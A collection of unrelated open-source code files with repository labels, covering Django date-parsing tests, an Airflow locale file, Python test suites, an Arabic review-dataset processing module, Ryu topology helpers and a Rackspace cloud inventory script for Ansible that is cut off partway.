("P4D", timedelta(days=4)),
("-P1D", timedelta(days=-1)),
("P0.5D", timedelta(hours=12)),
("P0,5D", timedelta(hours=12)),
("-P0.5D", timedelta(hours=-12)),
("-P0,5D", timedelta(hours=-12)),
("PT5H", timedelta(hours=5)),
("-PT5H", timedelta(hours=-5)),
("PT5M", timedelta(minutes=5)),
("-PT5M", timedelta(minutes=-5)),
("PT5S", timedelta(seconds=5)),
("-PT5S", timedelta(seconds=-5)),
("PT0.000005S", timedelta(microseconds=5)),
("PT0,000005S", timedelta(microseconds=5)),
("-PT0.000005S", timedelta(microseconds=-5)),
("-PT0,000005S", timedelta(microseconds=-5)),
("-P4DT1H", timedelta(days=-4, hours=-1)),
# Invalid separators for decimal fractions.
("P3(3D", None),
("PT3)3H", None),
("PT3|3M", None),
("PT3/3S", None),
)
for source, expected in test_values:
with self.subTest(source=source):
self.assertEqual(parse_duration(source), expected) | python | github | https://github.com/django/django | tests/utils_tests/test_dateparse.py |
{
"auditLog": {
"columns": {
"event": "इवेंट",
"extra": "अतिरिक्त",
"user": "उपयोगकर्ता",
"when": "कब"
},
"filters": {
"eventType": "इवेंट प्रकार"
},
"title": "ऑडिट लॉग"
},
"xcom": {
"columns": {
"dag": "डैग",
"key": "कुंजी",
"value": "मान"
},
"title": "XCom"
}
} | json | github | https://github.com/apache/airflow | airflow-core/src/airflow/ui/public/i18n/locales/hi/browse.json |
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Jun 1, 2012.
"""
from everest.interfaces import IMime
from everest.mime import XmlMime
from everest.mime import get_registered_mime_strings
from everest.mime import get_registered_mime_type_for_extension
from everest.mime import get_registered_mime_type_for_name
from everest.mime import get_registered_mime_type_for_string
from everest.mime import get_registered_mime_types
from everest.mime import get_registered_representer_names
from everest.mime import register_mime_type
from everest.testing import Pep8CompliantTestCase
from zope.interface import provider # pylint: disable=E0611,F0401
__docformat__ = 'reStructuredText en'
__all__ = ['MimeTestCase',
]
class MimeTestCase(Pep8CompliantTestCase):
def test_registry(self):
self.assert_raises(ValueError, register_mime_type,
MimeNotImplementingIMime)
self.assert_raises(ValueError, register_mime_type,
MimeWithDuplicateTypeString)
self.assert_raises(ValueError, register_mime_type,
MimeWithDuplicateNameString)
self.assert_raises(ValueError, register_mime_type,
MimeWithDuplicateFileExtensionString)
self.assert_true(XmlMime.mime_type_string
in get_registered_mime_strings())
self.assert_true(XmlMime.representer_name
in get_registered_representer_names())
self.assert_true(XmlMime in get_registered_mime_types())
self.assert_true(
get_registered_mime_type_for_string(XmlMime.mime_type_string)
is XmlMime)
self.assert_true(
get_registered_mime_type_for_name(XmlMime.representer_name)
is XmlMime)
self.assert_equal(
get_registered_mime_type_for_extension(XmlMime.file_extension),
XmlMime)
class MimeNotImplementingIMime(object):
pass
@provider(IMime)
class MimeWithDuplicateTypeString(object):
mime_type_string = 'application/xml'
representer_name = 'myxml'
file_extension = 'xmlish'
@provider(IMime)
class MimeWithDuplicateNameString(object):
mime_type_string = 'application/xmlish'
representer_name = 'xml'
file_extension = '.xmlish'
@provider(IMime)
class MimeWithDuplicateFileExtensionString(object):
mime_type_string = 'application/xmlish'
representer_name = 'myxml'
file_extension = '.xml' | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/compiler/classIndexer5.ts] ////
//// [classIndexer5.ts]
class Foo {
[key: string]: number;
#a: boolean;
#b = false;
}
//// [classIndexer5.js]
"use strict";
class Foo {
#a;
#b = false;
} | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/classIndexer5.js |
"""
intervaltree: A mutable, self-balancing interval tree for Python 2 and 3.
Queries may be by point, by range overlap, or by range envelopment.
Test module: IntervalTree, removal of intervals
Submitted as issue #41 (Interval removal breaks this tree) by escalonn
Copyright 2013-2018 Chaim Leib Halbert
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
from intervaltree import IntervalTree
from test import data
import pytest
def test_sequence():
t = IntervalTree()
t.addi(860, 917, 1)
t.verify()
t.addi(860, 917, 2)
t.verify()
t.addi(860, 917, 3)
t.verify()
t.addi(860, 917, 4)
t.verify()
t.addi(871, 917, 1)
t.verify()
t.addi(871, 917, 2)
t.verify()
t.addi(871, 917, 3) # Value inserted here
t.verify()
t.addi(961, 986, 1)
t.verify()
t.addi(1047, 1064, 1)
t.verify()
t.addi(1047, 1064, 2)
t.verify()
t.removei(961, 986, 1)
t.verify()
t.removei(871, 917, 3) # Deleted here
t.verify()
def test_structure():
"""
Reconstruct the original tree just before the removals, then
perform the removals.
"""
t = data.issue41_orig.tree()
t.verify()
t.removei(961, 986, 1)
t.verify()
t.removei(871, 917, 3)
t.verify()
if __name__ == "__main__":
# pytest.main([__file__, '-v'])
test_structure() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 10 16:27:03 2013
@author: Mohamed Aly <mohamed@mohamedaly.info>
"""
import codecs
import numpy as np
import pandas as pd
import re
class LABR:
def __init__(self):
self.REVIEWS_PATH = "../data/labr_data/"
self.RAW_REVIEWS_FILE = "raw_reviews.tsv"
self.DELETED_REVIEWS_FILE = "deleted_reviews.tsv"
self.CLEAN_REVIEWS_FILE = "reviews.tsv"
self.CLEAN_NO_STOP_REVIEWS_FILE = "nostopwords_reviews"
self.CLEAN_NO_STOP_STEMMED_REVIEWS_FILE = "nostopwords_stemmed_reviews"
self.NORMALIZED_REVIEWS_FILE = "norm_reviews.tsv"
# Copied from the PyArabic package.
def arabicrange(self):
"""return a list of arabic characteres .
Return a list of characteres between \u060c to \u0652
@return: list of arabic characteres.
@rtype: unicode;
"""
mylist = [];
for i in range(0x0600, 0x00653):
try :
mylist.append(unichr(i));
except ValueError:
pass;
return mylist;
# cleans a single review
def clean_raw_review(self, body):
# patterns to remove first
pat = [\
(u'http[s]?://[a-zA-Z0-9_\-./~\?=%&]+', u''), # remove links
(u'www[a-zA-Z0-9_\-?=%&/.~]+', u''),
# u'\n+': u' ', # remove newlines
(u'<br />', u' '), # remove html line breaks
(u'</?[^>]+>', u' '), # remove html markup
# u'http': u'',
(u'[a-zA-Z]+\.org', u''),
(u'[a-zA-Z]+\.com', u''),
(u'://', u''),
(u'&[^;]+;', u' '),
(u':D', u':)'),
# (u'[0-9/]+', u''),
# u'[a-zA-Z.]+': u'',
# u'[^0-9' + u''.join(self.arabicrange()) + \
# u"!.,;:$%&*%'#(){}~`\[\]/\\\\\"" + \
# u'\s^><\-_\u201D\u00AB=\u2026]+': u'', # remove latin characters
(u'\s+', u' '), # remove spaces
(u'\.+', u'.'), # multiple dots
(u'[\u201C\u201D]', u'"'), # “
(u'[\u2665\u2764]', u''), # heart symbol
(u'[\u00BB\u00AB]', u'"'),
(u'\u2013', u'-'), # dash
]
# patterns that disqualify a review
remove_if_there = [\
(u'[^0-9' + u''.join(self.arabicrange()) + \
u"!.,;:$%&*%'#(){}~`\[\]/\\\\\"" + \
u'\s\^><\-_\u201D\u00AB=\u2026+|' + \
u'\u0660-\u066D\u201C\u201D' + \
u'\ufefb\ufef7\ufef5\ufef9]+', u''), # non arabic characters
]
# patterns that disqualify if empty after removing
remove_if_empty_after = [\
(u'[0-9a-zA-Z\-_]', u' '), # alpha-numeric
(u'[0-9' + u".,!;:$%&*%'#(){}~`\[\]/\\\\\"" + \
u'\s\^><`\-=_+]+', u''), # remove just punctuation
(u'\s+', u' '), # remove spaces
]
# remove again
# patterns to remove
pat2 = [\
# u'[^0-9' + u''.join(self.arabicrange()) + \
# u"!.,;:$%&*%'#(){}~`\[\]/\\\\\"" + \
# u'\s^><\-_\u201D\u00AB=\u2026]+': u'', # remove latin characters
]
skip = False
# if empty body, skip
if body == u'': skip = True
# do some subsitutions
for k, v in pat:
body = re.sub(k, v, body)
# remove if exist
for k, v in remove_if_there:
if re.search(k, body):
skip = True
# remove if empty after replacing
for k, v in remove_if_empty_after:
temp = re.sub(k, v, body)
if temp == u" " or temp == u"":
skip = True
# do some more subsitutions
if not skip:
for k, v in pat2:
body = re.sub(k, v, body)
# if empty string, skip
if body == u'' or body == u' ':
skip = True
if not skip:
return body
else:
return u""
# Read raw reviews from file and clean and write into clean_reviews
def clean_raw_reviews(self):
# input file
in_file = codecs.open(self.REVIEWS_PATH + self.RAW_REVIEWS_FILE,
'r', encoding="utf-8")
reviews = in_file.readlines()
# Output file: rating<tab>content
out_file = open(self.REVIEWS_PATH + self.CLEAN_REVIEWS_FILE,
'w', buffering=100)
deleted_file = open(self.REVIEWS_PATH + self.DELETED_REVIEWS_FILE,
'w', buffering=100)
counter = 1
for i in xrange(0, len(reviews)):
review = reviews[i]
skip = False
# # If line starts with #, then skip
# if review[0] == u"#": continue
# split by <tab>
parts = review.split(u"\t")
# rating is first part and body is last part
rating = parts[0]
review_id = parts[1]
user_id = parts[2]
book_id = parts[3]
body = parts[4].strip()
# clean body
body = self.clean_raw_review(body)
if body == u"": skip = True
if i % 5000 == 0:
print "review %d:" % (i)
# write output
line = u"%s\t%s\t%s\t%s\t%s\n" % (rating, review_id, user_id,
book_id, body)
if not skip:
out_file.write(line.encode('utf-8'))
counter += 1
else:
deleted_file.write(line.encode('utf-8'))
# Read the reviews file. Returns a tuple containing these lists:
# rating: the rating 1 -> 5
# review_id: the id of the review
# user_id: the id of the user
# book_id: the id of the book
# body: the text of the review
def read_review_file(self, file_name):
reviews = codecs.open(file_name, 'r', 'utf-8').readlines()
# remove comment lines and newlines
reviews = [r.strip() for r in reviews if r[0] != u'#']
# parse
rating = list()
review_id = list()
user_id = list()
book_id = list()
body = list()
for review in reviews:
# split by <tab>
parts = review.split(u"\t")
# rating is first part and body is last part
rating.append(int(parts[0]))
review_id.append(parts[1])
user_id.append(parts[2])
book_id.append(parts[3])
if len(parts) > 4:
body.append(parts[4])
else:
body.append(u"")
return (rating, review_id, user_id, book_id, body)
# Writes reviews to a file
def write_review_file(self, file_name, rating, review_id, user_id,
book_id, body):
lines = list()
# loop
for i in xrange(len(rating)):
line = u"%s\t%s\t%s\t%s\t%s\n" % (rating[i], review_id[i],
user_id[i], book_id[i],
body[i])
lines.append(line)
open(file_name, 'w').write(u''.join(lines).encode('utf-8'))
def read_clean_reviews(self):
return self.read_review_file(self.REVIEWS_PATH +
self.CLEAN_REVIEWS_FILE)
def read_raw_reviews(self):
return self.read_review_file(self.REVIEWS_PATH + self.RAW_REVIEWS_FILE)
# Splits the dataset into a training/test sets in the setting of using 5
# classes (predicting the rating value from 1 to 5)
def split_train_test_5class(self, rating, percent_test,
balanced="unbalanced"):
np.random.seed(1234)
num_reviews = len(rating)
review_ids = np.arange(0, num_reviews)
if balanced == "unbalanced":
ntest = np.floor(num_reviews * percent_test)
np.random.shuffle(review_ids)
test_ids = review_ids[:ntest]
train_ids = review_ids[ntest:]
elif balanced == "balanced":
(sizes, bins) = np.histogram(rating, [1, 2, 3, 4, 5, 6])
min_size = np.min(sizes)
print min_size
# sample review ids equally among classes
test_ids = np.zeros((0,), dtype="int32")
train_ids = np.zeros((0,), dtype="int32")
rating = np.array(rating)
ntest = np.floor(min_size * percent_test)
for c in range(1, 6):
cids = review_ids[np.nonzero(rating == c)]
np.random.shuffle(cids)
test_ids = np.r_[test_ids, cids[:ntest]]
train_ids = np.r_[train_ids, cids[ntest:min_size]]
train_file = self.REVIEWS_PATH + "5class-" + balanced + "-train.txt"
test_file = self.REVIEWS_PATH + "5class-" + balanced + "-test.txt"
open(train_file, 'w').write('\n'.join(map(str, train_ids)))
open(test_file, 'w').write('\n'.join(map(str, test_ids)))
return (train_ids, test_ids)
# Splits the dataset into a training/test sets in the setting of using 2
# classes (predicting the polarity of the review where ratings 1 & 2
# are considered negative, ratings 4 & 5 are positive, and rating 3 is
# ignored)
def split_train_test_2class(self, rating, percent_test,
balanced="unbalanced"):
np.random.seed(1234)
rating = np.array(rating, dtype='int32')
# length
num_reviews = len(rating)
review_ids = np.arange(0, num_reviews)
# convert to binary, with ratings [1, 2] --> neg and [4, 5] --> pos
rating[rating == 2] = 1
rating[rating == 4] = 5
ids = (rating == 1) + (rating == 5)
review_ids = review_ids[ids]
rating = rating[ids]
rating[rating == 1] = 0
rating[rating == 5] = 1
# get length after filtering
num_reviews = rating.shape[0]
if balanced == "unbalanced":
ntest = np.floor(num_reviews * percent_test)
np.random.shuffle(review_ids)
test_ids = review_ids[:ntest]
train_ids = review_ids[ntest:]
elif balanced == "balanced":
(sizes, bins) = np.histogram(rating, [0, 1, 2])
min_size = np.min(sizes)
print min_size
# sample review ids equally among classes
test_ids = np.zeros((0,), dtype="int32")
train_ids = np.zeros((0,), dtype="int32")
rating = np.array(rating)
ntest = np.floor(min_size * percent_test)
for c in [0, 1]:
cids = review_ids[np.nonzero(rating == c)]
np.random.shuffle(cids)
test_ids = np.r_[test_ids, cids[:ntest]]
train_ids = np.r_[train_ids, cids[ntest:min_size]]
train_file = self.REVIEWS_PATH + "2class-" + balanced + "-train.txt"
test_file = self.REVIEWS_PATH + "2class-" + balanced + "-test.txt"
open(train_file, 'w').write('\n'.join(map(str, train_ids)))
open(test_file, 'w').write('\n'.join(map(str, test_ids)))
return (train_ids, test_ids)
# Splits the dataset into a training/validation/test sets in the setting of using 3
# classes (predicting the polarity of the review where ratings 1 & 2
# are considered negative, ratings 4 & 5 are positive, and rating 3 is considered
# neutral
def split_train_validation_test_3class(self, rating, percent_test, percent_valid,
balanced="unbalanced"):
np.random.seed(1234)
rating = np.array(rating, dtype='int32')
# length
num_reviews = len(rating)
review_ids = np.arange(0, num_reviews)
# convert to binary, with ratings [1, 2] --> neg and [4, 5] --> pos
rating[rating == 2] = 1
rating[rating == 4] = 5
ids = (rating == 1) + (rating == 5) + (rating == 3)
review_ids = review_ids[ids]
rating = rating[ids]
rating[rating == 1] = 0
rating[rating == 5] = 1
rating[rating == 3] = 2
# get length after filtering
num_reviews = rating.shape[0]
if balanced == "unbalanced":
ntest = np.floor(num_reviews * percent_test)
nvalid = np.floor(num_reviews * percent_valid)
np.random.shuffle(review_ids)
test_ids = review_ids[:ntest]
validation_ids = review_ids[ntest:ntest + nvalid]
train_ids = review_ids[ntest + nvalid:]
elif balanced == "balanced":
(sizes, bins) = np.histogram(rating, [0, 1, 2, 3])
min_size = np.min(sizes)
print min_size
# sample review ids equally among classes
test_ids = np.zeros((0,), dtype="int32")
validation_ids = np.zeros((0,), dtype="int32")
train_ids = np.zeros((0,), dtype="int32")
rating = np.array(rating)
ntest = np.floor(min_size * percent_test)
nvalid = np.floor(min_size * percent_valid)
for c in [0, 1, 2]:
cids = review_ids[np.nonzero(rating == c)]
np.random.shuffle(cids)
test_ids = np.r_[test_ids, cids[:ntest]]
validation_ids = np.r_[validation_ids, cids[ntest:ntest + nvalid]]
train_ids = np.r_[train_ids, cids[ntest + nvalid:min_size]]
train_file = self.REVIEWS_PATH + "3class-" + balanced + "-train.txt"
test_file = self.REVIEWS_PATH + "3class-" + balanced + "-test.txt"
validation_file = self.REVIEWS_PATH + "3class-" + balanced + "-validation.txt"
open(train_file, 'w').write('\n'.join(map(str, train_ids)))
open(test_file, 'w').write('\n'.join(map(str, test_ids)))
open(validation_file, 'w').write('\n'.join(map(str, validation_ids)))
return (train_ids, test_ids)
# Reads a training or test file. The file contains the indices of the
# reviews from the clean reviews file.
def read_file(self, file_name):
ins = open(file_name).readlines()
ins = [int(i.strip()) for i in ins]
return ins
# A helpter function.
def set_binary_klass(self, ar):
ar[(ar == 1) + (ar == 2)] = 0
ar[(ar == 4) + (ar == 5)] = 1
# A helpter function.
def set_ternary_klass(self, ar):
ar[(ar == 1) + (ar == 2)] = 0
ar[(ar == 4) + (ar == 5)] = 1
ar[(ar == 3)] = 2
# Returns (train_x, train_y, test_x, test_y)
# where x is the review body and y is the rating (1->5 or 0->1)
def get_train_test(self, klass="2", balanced="balanced"):
(rating, a, b, c, body) = self.read_clean_reviews()
rating = np.array(rating)
body = pd.Series(body)
train_file = (self.REVIEWS_PATH + klass + "class-" +
balanced + "-train.txt")
test_file = (self.REVIEWS_PATH + klass + "class-" +
balanced + "-test.txt")
train_ids = self.read_file(train_file)
test_ids = self.read_file(test_file)
train_y = rating[train_ids]
test_y = rating[test_ids]
train_x = body[train_ids]
test_x = body[test_ids]
if klass == "2":
self.set_binary_klass(train_y)
self.set_binary_klass(test_y)
return (train_x, train_y, test_x, test_y)
# Returns (train_x, train_y, test_x, test_y)
# where x is the review body and y is the rating (1->5 or 0->1)
def get_train_test_validation(self, klass="3", balanced="balanced"):
(rating, a, b, c, body) = self.read_clean_reviews()
rating = np.array(rating)
body = pd.Series(body)
train_file = (self.REVIEWS_PATH + klass + "class-" +
balanced + "-train.txt")
test_file = (self.REVIEWS_PATH + klass + "class-" +
balanced + "-test.txt")
validation_file = (self.REVIEWS_PATH + klass + "class-" +
balanced + "-validation.txt")
train_ids = self.read_file(train_file)
test_ids = self.read_file(test_file)
validation_ids = self.read_file(validation_file)
train_y = rating[train_ids]
test_y = rating[test_ids]
valid_y = rating[validation_ids]
train_x = body[train_ids]
test_x = body[test_ids]
valid_x = body[validation_ids]
if klass == "2":
self.set_binary_klass(train_y)
self.set_binary_klass(test_y)
self.set_binary_klass(valid_y)
elif klass == "3":
self.set_ternary_klass(train_y)
self.set_ternary_klass(test_y)
self.set_ternary_klass(valid_y)
return (train_x, train_y, test_x, test_y, valid_x, valid_y)
def split_train_validation_test_3class_tiny(self, rating, tiny_precent, percent_test, percent_valid,
balanced="unbalanced"):
np.random.seed(1234)
rating = np.array(rating, dtype='int32')
# length
num_reviews = len(rating)
review_ids = np.arange(0, num_reviews)
# convert to binary, with ratings [1, 2] --> neg and [4, 5] --> pos
rating[rating == 2] = 1
rating[rating == 4] = 5
ids = (rating == 1) + (rating == 5) + (rating == 3)
review_ids = review_ids[ids]
rating = rating[ids]
rating[rating == 1] = 0
rating[rating == 5] = 1
rating[rating == 3] = 2
# get length after filtering
num_reviews = rating.shape[0]
new_data_size = int(np.floor(tiny_precent * rating.shape[0]))
positive_reviews_precent = np.sum(rating == 1) * 1.0 / rating.shape[0]
negative_reviews_precent = np.sum(rating == 0) * 1.0 / rating.shape[0]
neutral_reviews_precent = np.sum(rating == 2) * 1.0 / rating.shape[0]
new_postive_size = np.round(positive_reviews_precent * tiny_precent * num_reviews)
new_negative_size = np.round(negative_reviews_precent * tiny_precent * num_reviews)
new_neutral_size = np.round(neutral_reviews_precent * tiny_precent * num_reviews)
np.random.shuffle(review_ids)
selected_ids = np.zeros(new_data_size,dtype='int32')
i=0
j=0
count_pos=0
count_neg=0
count_neutral=0
while(j<new_data_size):
if(rating[review_ids[i]]==1 and count_pos< new_postive_size):
selected_ids[j]=np.int(review_ids[i])
count_pos+=1
j+=1
elif(rating[review_ids[i]]==0 and count_neg< new_negative_size):
selected_ids[j]=np.int(review_ids[i])
count_neg+=1
j+=1
elif(rating[review_ids[i]]==2 and count_neutral< new_neutral_size):
selected_ids[j]=np.int(review_ids[i])
count_neutral+=1
j+=1
i+=1
if balanced == "unbalanced":
ntest = np.floor(new_data_size * percent_test)
nvalid = np.floor(new_data_size * percent_valid)
np.random.shuffle(selected_ids)
test_ids = selected_ids[:ntest]
validation_ids = selected_ids[ntest:ntest + nvalid]
train_ids = selected_ids[ntest + nvalid:]
elif balanced == "balanced":
(sizes, bins) = np.histogram(rating, [0, 1, 2, 3])
min_size = np.min(sizes)
print min_size
# sample review ids equally among classes
test_ids = np.zeros((0,), dtype="int32")
validation_ids = np.zeros((0,), dtype="int32")
train_ids = np.zeros((0,), dtype="int32")
rating = np.array(rating)
ntest = np.floor(min_size * percent_test)
nvalid = np.floor(min_size * percent_valid)
for c in [0, 1, 2]:
cids = selected_ids[np.nonzero(rating == c)]
np.random.shuffle(cids)
test_ids = np.r_[test_ids, cids[:ntest]]
validation_ids = np.r_[validation_ids, cids[ntest:ntest + nvalid]]
train_ids = np.r_[train_ids, cids[ntest + nvalid:min_size]]
train_file = self.REVIEWS_PATH + "3class-" + balanced + "-tiny-train.txt"
test_file = self.REVIEWS_PATH + "3class-" + balanced + "-tiny-test.txt"
validation_file = self.REVIEWS_PATH + "3class-" + balanced + "-tiny-validation.txt"
open(train_file, 'w').write('\n'.join(map(str, train_ids)))
open(test_file, 'w').write('\n'.join(map(str, test_ids)))
open(validation_file, 'w').write('\n'.join(map(str, validation_ids)))
return (train_ids, test_ids)
# l=LABR()
# (rating, a, b, c, body)=l.read_clean_reviews()
# l.split_train_validation_test_3class_tiny(rating,0.1, 0.2, 0.2) | unknown | codeparrot/codeparrot-clean | ||
blank_issues_enabled: false
contact_links:
- name: Question
url: https://github.com/abseil/abseil-cpp/discussions
about: Have a question? Ask us anything! :-) | unknown | github | https://github.com/mysql/mysql-server | extra/abseil/abseil-cpp-20230802.1/.github/ISSUE_TEMPLATE/config.yml |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ryu.base import app_manager
from ryu.topology import event
def get_switch(app, dpid=None):
rep = app.send_request(event.EventSwitchRequest(dpid))
return rep.switches
def get_all_switch(app):
return get_switch(app)
def get_link(app, dpid=None):
rep = app.send_request(event.EventLinkRequest(dpid))
return rep.links
def get_all_link(app):
return get_link(app)
def get_host(app, dpid=None):
rep = app.send_request(event.EventHostRequest(dpid))
return rep.hosts
def get_all_host(app):
return get_host(app)
app_manager.require_app('ryu.topology.switches', api_style=True) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# (c) 2013, Jesse Keating <jesse.keating@rackspace.com,
# Paul Durivage <paul.durivage@rackspace.com>,
# Matt Martz <matt@sivel.net>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Rackspace Cloud Inventory
Authors:
Jesse Keating <jesse.keating@rackspace.com,
Paul Durivage <paul.durivage@rackspace.com>,
Matt Martz <matt@sivel.net>
Description:
Generates inventory that Ansible can understand by making API request to
Rackspace Public Cloud API
When run against a specific host, this script returns variables similar to:
rax_os-ext-sts_task_state
rax_addresses
rax_links
rax_image
rax_os-ext-sts_vm_state
rax_flavor
rax_id
rax_rax-bandwidth_bandwidth
rax_user_id
rax_os-dcf_diskconfig
rax_accessipv4
rax_accessipv6
rax_progress
rax_os-ext-sts_power_state
rax_metadata
rax_status
rax_updated
rax_hostid
rax_name
rax_created
rax_tenant_id
rax_loaded
Configuration:
rax.py can be configured using a rax.ini file or via environment
variables. The rax.ini file should live in the same directory along side
this script.
The section header for configuration values related to this
inventory plugin is [rax]
[rax]
creds_file = ~/.rackspace_cloud_credentials
regions = IAD,ORD,DFW
env = prod
meta_prefix = meta
access_network = public
access_ip_version = 4
Each of these configurations also has a corresponding environment variable.
An environment variable will override a configuration file value.
creds_file:
Environment Variable: RAX_CREDS_FILE
An optional configuration that points to a pyrax-compatible credentials
file.
If not supplied, rax.py will look for a credentials file
at ~/.rackspace_cloud_credentials. It uses the Rackspace Python SDK,
and therefore requires a file formatted per the SDK's specifications.
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
regions:
Environment Variable: RAX_REGION
An optional environment variable to narrow inventory search
scope. If used, needs a value like ORD, DFW, SYD (a Rackspace
datacenter) and optionally accepts a comma-separated list.
environment:
Environment Variable: RAX_ENV
A configuration that will use an environment as configured in
~/.pyrax.cfg, see
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
meta_prefix:
Environment Variable: RAX_META_PREFIX
Default: meta
A configuration that changes the prefix used for meta key/value groups.
For compatibility with ec2.py set to "tag"
access_network:
Environment Variable: RAX_ACCESS_NETWORK
Default: public
A configuration that will tell the inventory script to use a specific
server network to determine the ansible_ssh_host value. If no address
is found, ansible_ssh_host will not be set. Accepts a comma-separated
list of network names, the first found wins.
access_ip_version:
Environment Variable: RAX_ACCESS_IP_VERSION
Default: 4
A configuration related to "access_network" that will attempt to
determine the ansible_ssh_host value for either IPv4 or IPv6. If no
address is found, ansible_ssh_host will not be set.
Acceptable values are: 4 or 6. Values other than 4 or 6
will be ignored, and 4 will be used. Accepts a comma-separated list,
the first found wins.
Examples:
List server instances
$ RAX_CREDS_FILE=~/.raxpub rax.py --list
List servers in ORD datacenter only
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD rax.py --list
List servers in ORD and DFW datacenters
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD,DFW rax.py --list
Get server details for server named "server.example.com"
$ RAX_CREDS_FILE=~/.raxpub rax.py --host server.example.com
Use the instance private IP to connect (instead of public IP)
$ RAX_CREDS_FILE=~/.raxpub RAX_ACCESS_NETWORK=private rax.py --list
"""
import os
import re
import sys
import argparse
import warnings
import collections
import ConfigParser
from six import iteritems
try:
import json
except ImportError:
import simplejson as json
try:
import pyrax
from pyrax.utils import slugify
except ImportError:
sys.exit('pyrax is required for this module')
from time import time
from ansible.constants import get_config
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.module_utils.six import text_type
NON_CALLABLES = (text_type, str, bool, dict, int, list, type(None))
def load_config_file():
p = ConfigParser.ConfigParser()
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'rax.ini')
try:
p.read(config_file)
except ConfigParser.Error:
return None
else:
return p
p = load_config_file()
def rax_slugify(value):
return 'rax_%s' % (re.sub(r'[^\w-]', '_', value).lower().lstrip('_'))
def to_dict(obj):
instance = {}
for key in dir(obj):
value = getattr(obj, key)
if isinstance(value, NON_CALLABLES) and not key.startswith('_'):
key = rax_slugify(key)
instance[key] = value
return instance
def host(regions, hostname):
hostvars = {}
for region in regions:
# Connect to the region
cs = pyrax.connect_to_cloudservers(region=region)
for server in cs.servers.list():
if server.name == hostname:
for key, value in to_dict(server).items():
hostvars[key] = value
# And finally, add an IP address
hostvars['ansible_ssh_host'] = server.accessIPv4
print(json.dumps(hostvars, sort_keys=True, indent=4))
def _list_into_cache(regions):
groups = collections.defaultdict(list)
hostvars = collections.defaultdict(dict)
images = {}
cbs_attachments = collections.defaultdict(dict)
prefix = get_config(p, 'rax', 'meta_prefix', 'RAX_META_PREFIX', 'meta')
try:
# Ansible 2.3+
networks = get_config(p, 'rax', 'access_network',
'RAX_ACCESS_NETWORK', 'public', value_type='list')
except TypeError:
# Ansible 2.2.x and below
# pylint: disable=unexpected-keyword-arg
networks = get_config(p, 'rax', 'access_network',
'RAX_ACCESS_NETWORK', 'public', islist=True)
try:
try:
# Ansible 2.3+
ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
'RAX_ACCESS_IP_VERSION', 4, value_type='list'))
except TypeError:
# Ansible 2.2.x and below
# pylint: disable=unexpected-keyword-arg
ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
'RAX_ACCESS_IP_VERSION', 4, islist=True))
except:
ip_versions = [4]
else:
ip_versions = [v for v in ip_versions if v in [4, 6]]
if not ip_versions:
ip_versions = [4]
# Go through all the regions looking for servers
for region in regions:
# Connect to the region
cs = pyrax.connect_to_cloudservers(region=region)
if cs is None:
warnings.warn(
'Connecting to Rackspace region "%s" has caused Pyrax to '
'return None. Is this a valid region?' % region,
RuntimeWarning)
continue
for server in cs.servers.list():
# Create a group on region
groups[region].append(server.name)
# Check if group metadata key in servers' metadata
group = server.metadata.get('group')
if group:
groups[group].append(server.name)
for extra_group in server.metadata.get('groups', '').split(','):
if extra_group:
groups[extra_group].append(server.name)
# Add host metadata
for key, value in to_dict(server).items():
hostvars[server.name][key] = value
hostvars[server.name]['rax_region'] = region
for key, value in iteritems(server.metadata):
groups['%s_%s_%s' % (prefix, key, value)].append(server.name)
groups['instance-%s' % server.id].append(server.name)
groups['flavor-%s' % server.flavor['id']].append(server.name)
# Handle boot from volume
if not server.image:
if not cbs_attachments[region]:
cbs = pyrax.connect_to_cloud_blockstorage(region)
for vol in cbs.list():
if boolean(vol.bootable, strict=False):
for attachment in vol.attachments:
metadata = vol.volume_image_metadata
server_id = attachment['server_id']
cbs_attachments[region][server_id] = {
'id': metadata['image_id'],
'name': slugify(metadata['image_name'])
}
image = cbs_attachments[region].get(server.id)
if image:
server.image = {'id': image['id']}
hostvars[server.name]['rax_image'] = server.image
hostvars[server.name]['rax_boot_source'] = 'volume'
images[image['id']] = image['name']
else:
hostvars[server.name]['rax_boot_source'] = 'local'
try:
imagegroup = 'image-%s' % images[server.image['id']]
groups[imagegroup].append(server.name)
groups['image-%s' % server.image['id']].append(server.name)
except KeyError:
try:
image = cs.images.get(server.image['id'])
except cs.exceptions.NotFound:
groups['image-%s' % server.image['id']].append(server.name)
else:
images[image.id] = image.human_id
groups['image-%s' % image.human_id].append(server.name)
groups['image-%s' % server.image['id']].append(server.name)
# And finally, add an IP address
ansible_ssh_host = None
